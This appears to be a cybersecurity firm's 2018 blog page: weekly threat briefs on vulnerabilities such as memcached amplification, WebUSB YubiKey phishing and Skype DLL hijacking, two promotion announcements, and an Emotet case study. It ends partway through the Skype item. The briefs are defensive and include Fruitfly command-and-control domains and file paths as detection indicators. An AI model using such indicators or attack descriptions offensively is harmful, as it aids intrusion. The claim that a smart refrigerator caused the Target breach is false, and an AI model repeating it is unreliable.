Netizen Blog and News

The Netizen team sharing expertise, insights and useful information in cybersecurity, compliance, and software assurance.

recent posts

about

  • Netizen Threat Brief: 21 March 2018 Edition

    Netizen Threat Brief: 21 March 2018 Edition

    Threats:

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. IoT Risks in Healthcare
    2. Text Editors Plugin Vulnerability
    3. Leaky VPNs

    1. IoT Risk in Healthcare

    Overview

    IoT, or Internet of Things, is a system of physical things that are embedded with software, sensors, electronics, and network connectivity. IoT functions by exchanging information with other connected devices, internet-based systems, or other types of control systems. IoT is especially prevalent in the Healthcare industry where it is used for inventory tracking, various medical devices (life support, inhalers, pacemakers, etc.) and remote patient monitoring equipment to name a few.

    Like anything connected to a network, there are risks. IoT devices in the Healthcare industries often lack proper security implementations, if there are any at all. Healthcare organizations have a very important need to protect their IoT devices from cyberattacks, especially since the lives of people are on the line should something go wrong.

    Recommendations

    Solutions for IoT devices are not always the easiest to implement—however there are actions that an organization can take to better protect their healthcare equipment and people:

    • Identify all IoT devices on the network, no matter how long it has been there. You cannot protect what you don’t know is there.
    • Data flows should be documented to ascertain what is needed and what is unnecessary and does not add value. With this knowledge, the network can be segmented appropriately—firewalling off any unneeded traffic.
    • Control the acquisition and implementation process—smart tv’s, fridges, etc. could open subtle channels for attackers to use to gain entry inside of the network. This happened in the well-known Target breach several years ago where a smart refrigerator was used to inject malware into the network and steal credit card numbers.
    • Perform regular vulnerability assessments on internal and external networks to reveal any hidden weaknesses or openings into environment. These risks should then be reviewed at regular intervals, implementing mitigation strategies as feasible.
    • Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.

    2. Text Editors Plugin Vulnerability

    Overview

    Text editors like Sublime, Vim, Emacs, Gedit, and pico/nano are used by developers, editors and writers to edit things like files and documents. Advanced editors, like the aforementioned, offer users extendibility by allowing the installation and running of third-party plugins to extend the editor’s functionality and scope.

    However, there’s inadequate separation of regular and elevated modes when loading plugins for these editors. For example, technical users will often need to edit “root-owned” files, requiring an editor with those elevated privileges and this could allow attackers to run malicious code on a victim’s machine, possibly taking full control of a targeted system.

    Recommendations

    Until developers of text editors change the folders and file permission models to complete the separation between regular and elevated or provide a manual interface for users to approve the elevated loading of plugins, we recommend:

    • Utilize open-source, host-based, intrusion detection systems (OSSEC, Snort, Kismet).
    • Actively monitor system activity, files integrity, logs, and processes.
    • If at all possible, avoid loading third-party plugins when the text editor is in an elevated state of permission.
    • Deny “write” permissions for non-elevated users.

    3. Leaky VPNs

    Overview

    Three popular VPN services were discovered to be leaking sensitive data. HotSpot Shield, PureVPN, and Zenmate contain vulnerabilities that could compromise a user’s privacy—including real IP addresses and their actual locations—allowing governments, hostile organizations, or other individuals to see this information.

    Three separate vulnerabilities were found HotSpot Shield, which has since been fixed by the company in later updates:

    • Hijack all traffic (CVE-2018-7879) — This vulnerability resided in Hotspot Shield’s Chrome extension and could have allowed remote hackers to hijack and redirect victim’s web traffic to a malicious site.
    • DNS leak (CVE-2018-7878) — DNS leak flaw in Hotspot Shield exposed users’ original IP address to the DNS server, allowing ISPs to monitor and record their online activities.
    • Real IP Address leak (CVE-2018-7880) — This flaw poses a privacy threat to users since hackers can track user’s real location and the ISP. the issue occurred because the extension had a loose whitelist for “direct connection.” Researchers found that any domain with localhost, e.g., localhost.foo.bar.com, and ‘type=a1fproxyspeedtest’ in the URL bypass the proxy and leaks real IP address.

    It should be noted that these vulnerabilities were found in HotSpot Shield’s free Chrome plugin, and not in their desktop or smartphone apps. It is likely that there are similar vulnerabilities in the Chrome plugins of PureVPN and Zenmate but they have not yet been formally disclosed and no patches have been made to fix them. These risks may be prevalent in other VPN services outside of the three listed here.

    Recommendations

    If using any of these services, we recommend:

    • Check with the vendor as to the status of the vulnerabilities—have they been fixed? Is anything being done?
    • Do no use the Chrome plugin associated with these services—it is not secure.
    • If using HotSpot Shield, apply current patches.

    For the time being, discontinue VPN services with Zenmate and PureVPN—at least until patches have been released for the leaks.

    How can Netizen help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

     

  • Cybersecurity By The Numbers: Market Estimates, Forecasts, And Surveys

    Cybersecurity By The Numbers: Market Estimates, Forecasts, And Surveys

    What is the state of the cybersecurity industry and practice today? Recent surveys and analysis provide fresh insights, from senior management and board of directors not taking cyber threats seriously enough, IoT and mobile security deficiencies, the perennial cybersecurity skills shortage, new types of attacks on consumers and businesses, and the increasing threat of a global cyber war.

    These old and new cybersecurity challenges make 2018 yet another year of “more of everything.” But it will also be the year in which the fact that security and privacy are two sides of the same coin will be reinforced, driving significant changes in cybersecurity practices. In “60 cybersecurity predictions for 2018” I wrote, “Like death and taxes, there are only two safe predictions about cybersecurity in 2018: There will be more spectacular data breaches and the EU General Data Protection Regulation (GDPR) will go into effect on May 25.” ESG’s Jon Oltsik wrote today: “Data privacy officers and CISOs should re-investigate whether they are truly ready for GDPR. If your organization doesn’t have automated and auditable processes to find, delete, and verify data erasure at scale, the answer is definitely, ‘no.’”

    Read More……..

  • Netizen Threat Brief: 14 March 2018 Edition

    Netizen Threat Brief: 14 March 2018 Edition

    Threats:

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Fruitfly/Quimitchin Malware
    2. Chrome WebUSB Vulnerability
    3. Slingshot Router Vulnerability

    1. Fruitfly/Quimitchin Malware

    Overview

    The Fruitfly Malware, discovered primarily in macOS systems, is using antiquated code to help run undetected and has been reported to attack biomedical research institutions. Some of the code involved also shows signs of running on Linux as well.

    Fruitfly, known as OSX.Backdoor.Quimitchin when detected, is used to access user information, log keystrokes to gather credentials, and pivot into other systems and services. It contains just two files: one hidden script is used to communicate back to servers—taking screenshots and reporting system uptime—the second script grants the malware the ability to hide its icon from showing in the macOS Dock. The malware’s primary intention is to grab screenshots and gain webcam access.

    Antiquated software Fruitfly runs on includes: SGGetChannelDeviceList, SGSetChannelDevice, SGSetChannelDeviceInput, and SGStartRecord.

    Recommendations

    The attack vector for Fruitfly includes these externally facing services:

    • Apple Filing Protocol (AFP, port 548)
    • RDP or other VNC
    • SSH (port 22)
    • Back to My Mac (BTMM)

    The following are network indicators of Fruitfly/Quimitchin presence:

    • eidk.duckdns.org
    • h8cnq8.duckdns.org
    • hh4de2.duckdns.org
    • hlkmm2.duckdns.org
    • hnqi24.duckdns.org
    • fejose2.duckdns.org
    • fovdim2.duckdns.org
    • eidk.hopto.org
    • eutq.hopto.org
    • tmp1.hopto.org
    • tmp2.hopto.org
    • h8cnq8.hopto.org
    • hh4de2.hopto.org
    • hlkmm2.hopto.org
    • hnqi24.hopto.org
    • fejose2.hopto.org
    • fovdim2.hopto.org

    Mac host-based indicators:

    • ~/Library/LaunchAgents/com.client.client.plist
    • ~/Library/LaunchAgents/com.adobe.ARM.<16 random alphanumeric characters>.plist
    • ~/.tmp
    • ~/.client
    • ~/fpsaud
    • ~/Library/Application Support/<16 random alphanumeric characters>
    • ~/.cr or ~/.cr2

    Windows host-based indicators:

    • Path of %PROGRAMFILES%\Sophos Suite for NT\
    • Custom (per infection) executable with ‘SAVCleanupService.exe’ or ‘SAVservice.exe’
    • C:\a.exe
    • C:\ab.exe
    • C:\client.exe

    Our recommendations will vary in response to different networks, however, system credentials should be both strong, complex, and updated at regular intervals. It is also important to keep antivirus software up to date for the best possible chance of catching malware. It would also prove beneficial to conduct a vulnerability assessment of the local network in its entirety to discover deep rooted malware, such as this, that may be hidden without knowledge.

    2. Chrome WebUSB Vulnerability

    Overview

    Multifactor Authentication (MFA) has been widely used as an added layer of security for credentials and logins. A common example of MFA would be logging into a work account and after entering the password, a verification notification is sent to a user’s phone by way of app or text message to confirm the valid sign-in. While this method is common, there are many other methods—one of which is YubiKey.

    YubiKey utilizes a token system, in which a USB device is inserted very much like a regular key. To login, a user would enter their username, plug in their YubiKey and physically press the key to gain access—meaning you cannot log into this account without that key—making this incredibly useful against phishing attempts. Sounds secure right?

    A new browser feature in Google Chrome, known as Chrome WebUSB (or WebUSB, is being exploited to potentially bypass the account protections of any victim using a YubiKey.

    With a carefully crafted phishing website, a hacker can trick a victim into typing their username and password—which is just standard phishing—but will then send a query directly from their malicious site to the victim’s YubiKey, using that response to unlock that person’s account.

    Recommendations

    Chrome WebUSB allows websites to directly connect to USB devices, and until a patch is released, we recommend:

    • If feasible do not use tokens like YubiKey on Chrome
    • Verify the sites that you are using are legitimate. It is worth noting that these hackers have to prompt the victim’s permission to enable WebUSB access to their YubiKey as well as the physical touch of the key. Do not enable if you do not trust the site.
    • Be aware of phishing attempts, often appearing as trustworthy emails which contents may be intimidating or even threating—asking for account/billing updates—claiming a consequence if the required materials are not met.

    3. Slingshot Router Vulnerability

    Overview

    A new cyber-threat, known as Slingshot, is a form of cyber-espionage that targets routers and uses them as a launch pad to attack other computers within a network—collecting screenshots, keyboard data, network data, passwords, USB connections, other desktop activity, clipboard data and more, although its kernel access means it can steal whatever it wants. This new Slingshot campaign utilizes a wide variety of tools and techniques, making it a much more complex attack than most other malware.

    During the configuration process of the router, the router’s managements software downloads and runs the malicious module on the administrator’s computer. As it currently stands, the method of hacking is currently unknown.

    Once the router is infected, Slingshot then downloads a range of additional malware modules onto the device—most notably, Cahnadr and GollumApp. The two pieces of malware link together to support each other in gathering information. Cahnadr, in particular, initiates a kernel-mode program that executes malicious code without crashing the entire file system. The complexity of Slingshot itself is indicative of a highly organized group—if not an entity that is state sponsored.

    Recommendations

    As it appears, individual victims are the main focus rather than organizations, however, there have still been some government institutions being targeted. Current research suggests that MikroTik routers are the only devices affected, although some victims could have been infected through other means.

    We recommend to all MikroTik users to upgrade their routers to the latest firmware version as soon as possible. We recommended other brands of routers be upgraded/updated as well, and to also keep all antivirus software current and up to date. Finally, workstation’s and systems should be patched accordingly, as some vulnerable services on these system may have also allowed Slingshot to enter the network.

    How can Netizen help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • NETIZEN PROMOTES RAY HARRIS TO VICE PRESIDENT OF OPERATIONS

    Allentown, PA: Netizen Corporation, an award-winning provider of cyber security and related solutions for government and commercial markets, has formally promoted Raymond M. “Ray” Harris, Jr. to Vice President (VP) of Operations. Ray joined Netizen in 2015 as a Program Manager after a successful 30-year career with a Fortune 500 company supporting nuclear operations and, later, corporate information technology where he managed IT infrastructure operations across all of that company’s North American facilities.

    At Netizen, Ray manages a portfolio of defense, government and commercial cybersecurity programs that provide support to customers around the world. As a Vice President, Ray now officially joins the core senior executive team of Netizen in managing components of company-wide operations. He is responsible for ensuring the efficient execution of all projects with high quality and customer satisfaction as well as the compliance of company operations with pertinent regulatory, contractual, and other requirements or standards.

    “Ray has quickly become a key resource for managing the rapidly expanding defense, civilian government and commercial divisions of our company. This promotion recognizes his hard work, success, and the tremendous value that his operations management experience brings to bear for customer engagements around the world,” said Mike Hawkins, Netizen’s Chief Executive Officer. He added that Ray will continue to work out of Netizen’s Allentown, PA headquarters and manage a wide range of customer sites, employee locations, and Netizen offices across 12 states and growing.

    Netizen has been awarded over $12,000,000 in contracts to provide cyber security and related solutions to the federal government in the past two years. They also provide these solutions to state government, municipal, and commercial customers to aid in maintaining the security and compliance of mission-critical IT infrastructure.

    About Netizen Corporation: Named the Lehigh Valley’s “Emerging Business of the Year” in 2015 and a recipient of Department of Defense (DoD) awards for superior customer service, Netizen is an Allentown, Pennsylvania based Service Disabled Veteran-Owned Business (SDVOSB) specializing in cyber security, compliance, and software assurance for defense, federal, and commercial markets. Their CyberSecure Solutions™ products and services are trusted to monitor and protect critical infrastructure in a cost-effective manner. Learn more at https://www.NetizenCorp.com.

    #####

  • That Time Of Year Again: Cisco Systems Releases Its Annual Cybersecurity Report

    That Time Of Year Again: Cisco Systems Releases Its Annual Cybersecurity Report

    Last week, Cisco Systems released the 2018 edition of its Annual Cybersecurity Report (ACR) you can find here. The report, compiled from a survey of 3,600 chief security officers (CSOs) and security operations leaders from across the globe, seeks to highlight emerging threats in the rapidly evolving landscape of cybersecurity. With 53% of all attacks resulting in damages of $500,000 or more (according to this year’s report), it’s obviously important to keep a finger on the pulse of cybercrime as it is a constantly moving target. As I noted in last year’s recap, these annual reports are well-regarded in the industry, even by Cisco Systems’ competitors—they always take a measured, industry-focused look at the state of affairs, and are not openly slanted towards driving Cisco Systems sales. Yes, what they are saying maps nicely to their security portfolio, but if it didn’t, you would have to scratch your head and ask “why not”. Here are my takeaways from this year’s report.

    Read More………

  • Netizen Threat Brief: 7 March 2018 Edition

    Netizen Threat Brief: 7 March 2018 Edition

    Threats

    Listed below is information regarding three of this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Adobe Acrobat Reader DC Remote Code Execution
    2. Misconfigured Memcached Servers
    3. WordPress ionCube Malware

    1. Adobe Acrobat Reader DC Remote Code Execution

    Overview

    A remote code execution vulnerability has been discovered in Adobe Acrobat Reader DC that runs when either a malicious file is opened, or a socially engineered web-page is accessed.

    Malicious JavaScript code is hid inside of a PDF file that can enable a document ID to perform unauthorized operations to trigger a stack-based buffer overflow when opening a PDF file; in which an attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code. This vulnerability poses a great threat as Adobe Acrobat Reader is by far the most popular PDF reader out there with a large user base and is often the default PDF reader on some systems while also integrating with web browsers as a plugin for rendering PDF documents.

    Recommendations

    Affected Adobe Acrobat Reader versions include:

    • 009.20050
    • 011.30070
    • 006.30394
    • And earlier versions

    Adobe has released security updates for Adobe Acrobat and Reader, and we recommend applying those updates as soon as possible.

    It is also important to exercise good end-user awareness:

    • Examine your emails
    • Hover over links and attachments—when you hover over a link, a small window pops up to show you where the link really goes. If the real link doesn’t match the sender or doesn’t match what you expect, assume it is poisoned and don’t click it.
    • Do you know the sender?

    Verify with the person on the email that they truly sent it.

    2. Misconfigured Memcached Servers

    Overview

    Cybercriminals have long used denial of service (DoS) and distributed denial of service (DDoS) attacks which paralyze networks and systems by flooding them with egregious amounts of data. Recently, these cybercriminals have been leveraging misconfigured Memcached servers to amplify these types of attacks, by as much as 51,200x what they normally do. Memcached servers are a type of server used to bolster responsiveness of database-driven websites by improving the memory caching system.

    Attackers are able to send a small byte-sized UDP-based packet request to a memcached server on port 11211. The packets would be spoofed to appear as if they were sent from the intended target of the DDoS attack. In response, the memcache server responds by sending the spoofed target a massively disproportionate response.

    Recommendations

    If using memchached servers, we recommend:

    • Disable UDP support if you are not using it as it is enabled by default.
    • Ensure that your memchached servers are firewalled from the internet
    • Block port 11211 UDP and TCP
    • Any developers should also stop using UDP and stop enabling it by default

    If using UDP, respond with a strictly smaller packet size than the request—otherwise, the protocol can be abused.

    3. WordPress ionCube Malware

    Overview

    A new subtle strain of malware has been discovered to pose as legitimate ionCube files, aptly named ionCube Malware. This new attack is being utilized by cybercriminals to create backdoors on vulnerable websites which allows them to steal data or plant more damaging malware.

    IonCube is a commercial PHP scrambler that turns text-based PHP files—used to create dynamic content on websites—into an undecipherable code often to hide the intellectual property associated with licensed PHP files.

    Recommendations

    The malware infections are being attributed to out of date content management system (CMS) plugins and platform software. Samples that were identified in the infections are named “diff98.php” and “wrgcduzk.php”, found in the WordPress core directories. Cybercriminal are also naming part of the malicious ionCube code very similar to legitimate code. For example, the real code may look like “_il_exec” but the cybercriminals will use “il_exec”.

    We recommend keeping all CMS plugins and software up to date. One of WordPress’ biggest flaws is when one of their many plugins go out of date, making plugin management very important. It would also prove beneficial to examine the ionCube files for inconsistencies and inaccuracies to make sure that nothing was tampered with.

    How can Netizen help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • Netizen Threat Brief: 28 February 2018 Edition

    Netizen Threat Brief: 28 February 2018 Edition

    Threats

    Listed below is information regarding two of this week’s most critical threats, and preventative measures to lessen the chances of a breach. Also contained in this brief, is an update to a previous vulnerability:

    1. Spike in W-2 Phishing Campaigns
    2. Single Sign-On Vulnerability
    3. Intel Spectre Firmware Fixes

    1. Spike in W-2 Phishing Campaigns

    Overview

    The FBI has warned of a sharp rise in phishing campaigns targeting businesses’ W-2 information from payroll personnel. Given that it is tax season, these types of emails are after very important personal information, including employee’s social security numbers likely from an individual within Human Resources as they have access to that type of information.

    The phishing attacks range from the impersonation of an executive down to a legitimate looking email requesting employee information. In certain cases, after the cyber criminals had obtained the W-2 information, they would immediately follow up with a request for a wire transfer—many organizations were unaware for weeks or even months that they had been scammed.

    Recommendations

    Human error is one of the biggest entry points for cyber criminals.

    To mitigate a breach, we recommend:

    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email—this is huge red flag.
    • Do not give out personal or company information.
    • Review both signature and salutation.
    • Do not click on attachments
    • Do not click on unrecognized links. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place (HTTPS)
    • Be wary of poor spelling, grammar, and formatting.
    • Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action or that is addressing you in a threatening manner should be questionable. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Staff Pay Raises 2018” may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.
    • Verify the sender—even if that means calling the person to confirm it was them who is requesting or sending the email.

    We also suggest that businesses maintain a hard copy of vendor contact information with a list of those that are authorized to approve changes in payment instructions. Also, businesses should delay a transaction until further additional verifications can be performed. For example, make staff wait to be contacted by the bank to verify the wire transfer.

    2. Single Sign-On Vulnerability

    Overview

    Single sign-on (SSO) is a session and user authentication service that organizations often leverage to use one set of login credentials in order to access multiple applications. SSO is extremely convenient as it will authenticate the end user for every application that the user has authorization and rights to, while also eliminating further prompts when switching between applications. SSO is also helpful for logging and monitoring users’ accounts and activity on the backend.

    A new vulnerability has been discovered based on Security Assertion Markup Language (SAML)—an open standard that allows security credentials to be shared by multiple computers across a network—in which hackers can trick systems using SAML to grant them higher access. Using an existing user ID and password, which can be obtained legitimately or through other means (i.e. social engineering), a hacker can fool the SAML system into authenticating another user without needing that user’s password. Predictability plays a factor, as most organizations have a pattern with which they delegate ID’s, making it easy to find or guess what the ID is; and with an exploited SAML system with one set of credentials, higher access can be attained.

    Recommendations

    Vendors known for using SAML and SSO systems are: OneLogin, Clever, OmniAuth, Shibboleth and Duo Network Gateway. We recommend that SAML-based systems utilizing the SSO service have applied patches and updates as soon as feasible. It would also prove beneficial to leverage multifactor authentication (MFA)—even if an account is compromised, there is that added second layer of security that prevents the access as further verification is required.

    3. Intel Spectre Firmware Fixes (Update)

    Overview

    In a previous Threat Brief entitled, “Major Microchip Flaws”, government research had revealed two major flaws in the computer processor chips of everyday devices. The flaws, known as Meltdown and Spectre, exist within processors that could allow an attacker to read sensitive data stored in memory—such as passwords or data from current system processes. Research also suggests that the chips themselves would need to be replaced to constitute a complete fix but patches have been released by major vendors to mitigate the most extreme vulnerabilities associated with this threat.

    While the data within the devices should be protected and isolated, there are cases where the processor can be exposed while it queues up information. Affected devices include, but are not limited to: desktops, laptops, smartphones, and cloud servers.

    Update

    In response to the vulnerabilities, Intel has issued an updated microcode that will help protect and fend off the Spectre security exploit in their newer processors—6th, 7th, 8th generation Intel core processors and Intel Xeon scalable processors to name a few.

    Intel has stated that the new microcode updates will be made available in most cases through OEM firmware updates. It is also recommended to continue with routine patching, updates, and upgrades to systems. The discovery of Meltdown and Spectre by Google Project Zero in early January now has Intel looking to bolster their security efforts in getting ahead of potential and newfound threat vectors.

    How can Netizen help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • NETIZEN PROMOTES GREGORY ALLEN TO SENIOR VICE PRESIDENT

    Allentown, PA: Netizen Corporation, an award-winning provider of cyber security and related solutions for government and commercial markets, has formally promoted Gregory R. “Greg” Allen to Senior Vice President (SVP) of Strategic Accounts. Greg joined Netizen a year ago and has a career as a successful sales and operations executive with government contractors spanning the past 35 years.

    At Netizen, Greg develops strategic relationships with key government customers and partner companies to bring them trusted expertise and innovative solutions. He covers geographic locations including Maryland; Virginia; Washington, DC; Charleston, SC; and portions of the Midwest and West Coast of the United States. As Senior Vice President, Greg officially joins the core senior executive team of Netizen in managing components of company-wide business development. He is responsible for escalating growth into federal health IT, select civilian and defense government agencies, and state governments.

    “Greg has quickly become a key resource for facilitating growth into new strategic markets. This promotion recognizes his hard work, success, and the tremendous value that his experience and sphere of influence bring to the company,” said Max Harris, Netizen’s Chief of Business Development. He added that Greg will be focused in the DC Metropolitan area and other locations as assigned. He will be working to attain further strategic company growth by meeting with government agencies and establishing winning teams with partner companies that deliver the innovation, responsiveness, and value that Netizen is renowned for.

    Netizen has been awarded over $12,000,000 in contracts to provide cyber security and related solutions to the federal government in the past two years. They also provide these solutions to state government, municipal, and commercial customers to aid in maintaining the security and compliance of mission-critical IT infrastructure.

    About Netizen Corporation: Named the Lehigh Valley’s “Emerging Business of the Year” in 2015 and a recipient of Department of Defense (DoD) awards for superior customer service, Netizen is an Allentown, Pennsylvania based Service Disabled Veteran-Owned Business (SDVOSB) specializing in cyber security, compliance, and software assurance for defense, federal, and commercial markets. Their CyberSecure Solutions™ products and services are trusted to monitor and protect critical infrastructure in a cost-effective manner. Learn more at https://Netizen.net.

    #####

  • Netizen Case Study: 2018 Allentown City Government Breach

    Netizen Case Study: 2018 Allentown City Government Breach

    Overview:

    Allentown’s city government has been breached and invaded by a serious computer virus known as Emotet, or possibly a new variant of the Emotet malware that adds functionality to make it more dangerous and less easy to detect and remove. Variants of this malware have been a known threat globally since at least 2014, but attackers have been evolving it to better evade detection and mitigation systems since that time. It is typically propagated through Microsoft Word email attachments that are laden with malicious scripts, or macros, that download and install the virus onto a local computer that then looks for connected network devices and folders to spread to.

    This particular virus originally functioned as a banking trojan which looks to steal financial information by injecting computer code into the shared folders and drives of connected computers on a network. Emotet now also possesses the capability to steal address book data, crack and steal network passwords, and perform denial of service (DoS) attacks on connected systems. It has since apparently infected critical systems within nearly all of Allentown government and is forcing the city to shut down a large portion of their information operations.

    Impact:

    The virus was first discovered in Allentown on or about Thursday, February 15, 2018. At the time, it was already self-replicating and stealing credentials of city employees on Microsoft applications and platforms. However, officials have stated that there is not yet evidence to suggest that any personal information of city residents has been compromised.

    Due to the impact of remediating the virus, Allentown’s finance department cannot complete any external banking transactions, local video surveillance networks are down, and city law enforcement cannot access databases controlled by the Pennsylvania State Police and many other day-to-day functions are greatly affected. Essentially, any city function that relies upon information technology assets are either shut down or severely crippled by efforts to remove the virus and repair damage. This particular data breach has proven to be very costly and damaging already, and it is still in the primary stages of containment.

    The fix, and overall removal of the virus from all systems, is expected to cost at least an estimated $1 million dollars, perhaps more as these efforts are typically underestimated at the time of the breach. There was an initial contract of $185,000 awarded to a Microsoft emergency response team to assess and stop the spread of the malware. Additional costs exceeding $800,000 to $900,000 will then have to be spent on the recovery of data as well as other repairs for the damage that the virus has done. This does not include additional costs if in fact employee or citizen data has been breached or stolen.

    The aforementioned impact and overview information has been compiled from public statements and reports made by city officials regarding the incident. Though Netizen has not performed any work for the city of Allentown related to this breach at this time, the motives, methods, and tools leveraged for this particular attack are highly similar to prior attacks on other entities.

    What Can Be Learned From This?

    In cases similar to the attack on Allentown city government systems, there are several preventative tools, processes, and resources available to organizations that will help either prevent such attacks in the future altogether or at least mitigate the effects and contain the remediation costs of a breach.

    End-user awareness and training is probably the most important approach to preventing an attack from the beginning. Attackers make their way into networks most often through human error – such as clicking on suspicious email attachments. A simple annual (or, better yet, quarterly) training about practicing proper “cyber hygiene”—such as using strong passwords, not sharing credentials, teaching what to look for in a phishing email, how to report a suspected breach, and how to properly secure unattended devices and computer systems – can go a long way in helping mitigate or prevent a large majority of breaches. In the event of Emotet, it is imperative to not trust every email with an attachment. It may ask you to allow or enable macros for the attachment to which you should refuse. Macros should be disabled by default. Examine the email—is this from a sender that you know? And if so, call that person to verify that they had sent you the attachment.

    It is also worth utilizing Multifactor Authentication (MFA) as an additional layer of security for network resources. This could be a text alert on your phone to approve a sign in or another MFA device such as a YubiKey or the Microsoft Authenticator app. These are highly cost effective and actually a feature of many modern software applications that just needs to be activated for use. Even if attackers have stolen passwords, they would still need that second level of authentication to access any of the accounts, network shares, and data therein. Another effective defense as well would be to isolate your passwords. This means that once a password is used at home, never use any variation of that at work—or vice versa.  Any intermingling will mean that once one account is compromised, that can then be used to try and break into another separate account either at work or on a personal system you own.

    A more technical security strategy is proper network segmentation—breaking down a network into various components that are “firewalled” off so malware cannot “crosswalk” across and steal everything. For instance, a computer in the public works department should not be able to access servers and computers in the finance department. Limit the level of access between machines and departments—this includes permissions and privileges amongst employees as well. This is the principle of “least privilege” that is commonly employed to help contain attacks when they occur. Furthermore, if a computer does not need to access the Internet, or would only need it at certain times, then this should be configured on the external firewall. Most business class firewalls can also black list or deny foreign addresses and be configured to do so.

    It is also essential to have security and event monitoring capabilities. An open-source resource that we leverage extensively is GrayLog. This log and event monitoring software is scalable, flexible, and customizable – not to mention free. With the proper inputs from IT systems, GrayLog allows you to monitor network traffic to find out who is doing what, where connections are coming and going from, and any other abnormal events that pose a threat. Coupled with vulnerability monitoring, which scans systems and networks for improper configuration, missing patches, and gaps in their security stance, this becomes a very powerful set of tools used to help mitigate the spread of malware across a sensitive network and often help prevent the intrusion in the first place using real-time data. Combined with what are known as Threat Intelligence feeds, it would be easier to spot if your machines are communicating with a known attacker anywhere in the world without you knowing it. Once such popular vulnerability monitoring tool is the Netizen CyberSecure scanner and dashboard, leveraged to scan systems for over 180,000 different types of vulnerabilities and report them in an easy-to-interpret analytics dashboard that can be integrated easily into an existing IT infrastructure.

    A centralized antivirus and system management solution provides organizations with a comprehensive view of their antivirus defenses, real-time system-wide status, and granular command and control over network resources. The basic feature set of all antivirus and system management suites is the ability to see all users on the network, know what application versions they’re running, efficiently and expediently update virus signatures and policies, and receive alerts and other reports. You can also control who connects to the network and where at any time. A good example would be Symantec’s Centralized Management Console.

    Lastly, having properly documented policies and procedures for data security and backup/recovery operations may not necessarily work to prevent a breach, but can dramatically lessen the impacts and costs involved afterwards. Proper disaster recovery plans and preparations, including having geographically distinct backups sites for data and quarterly backup tests, can mitigate the downtime associated with a breach and also prevent having to spend millions reconstructing damaged or deleted data. A comprehensive security plan addressing roles and responsibilities, organizational policies, and other aspects of information security will also formalize and standardize efforts, thus eliminating or at least greatly reducing the confusion inflicted by such an event.

    To summarize, a basic approach consisting of essential proactive cybersecurity measures can be very cost effective to implement, especially in comparison to breach cleanup costs that typically run into the millions of dollars and are almost always underestimated due to numerous hidden costs and damages not known at the time of the breach. The goal of any organization should be to put in place tools, processes, and controls tailored to their acceptable levels of risk and balanced with their budget to ensure they are not a “soft target.” This can prevent the majority of attacks out there and, at the very least, contain the damage inflicted by a breach to acceptable and tolerable levels which are far easier to recover from both financially and otherwise.

    For more information,
    visit our website at https://www.Netizen.net or call 1-844-NETIZEN

  • Netizen Threat Brief: 21 February 2018 Edition

    Threats

    Listed below is information regarding three of this week’s most critical threats, and preventative measures to lessen the chances of a breach:

    1. Severe Skype Vulnerability
    2. Domain Hijacking
    3. Windows 10 Null Character Flaw

    1. Severe Skype Vulnerability

    Overview

    A serious vulnerability has been discovered in one of the most popular free web messaging and voice calling service (Skype) that could potentially allow attackers to gain full control of the host machine by granting system-level privileges to a local, unprivileged user.

    The vulnerability has been discovered and reported to Microsoft and resides in Skype’s update installer, which is susceptible to Dynamic Link Library (DLL) hijacking. The exploitation of this would allow the attacker to hijack the update process by downloading and placing a malicious version of a DLL file into a temporary folder of a Windows PC and renaming it to match a legitimate DLL that can be modified by an unprivileged user without having any special account privileges. When Skype’s update installer tries to find the relevant DLL file, it will find the malicious DLL first, and thereby will install the malicious code.

    Recommendations

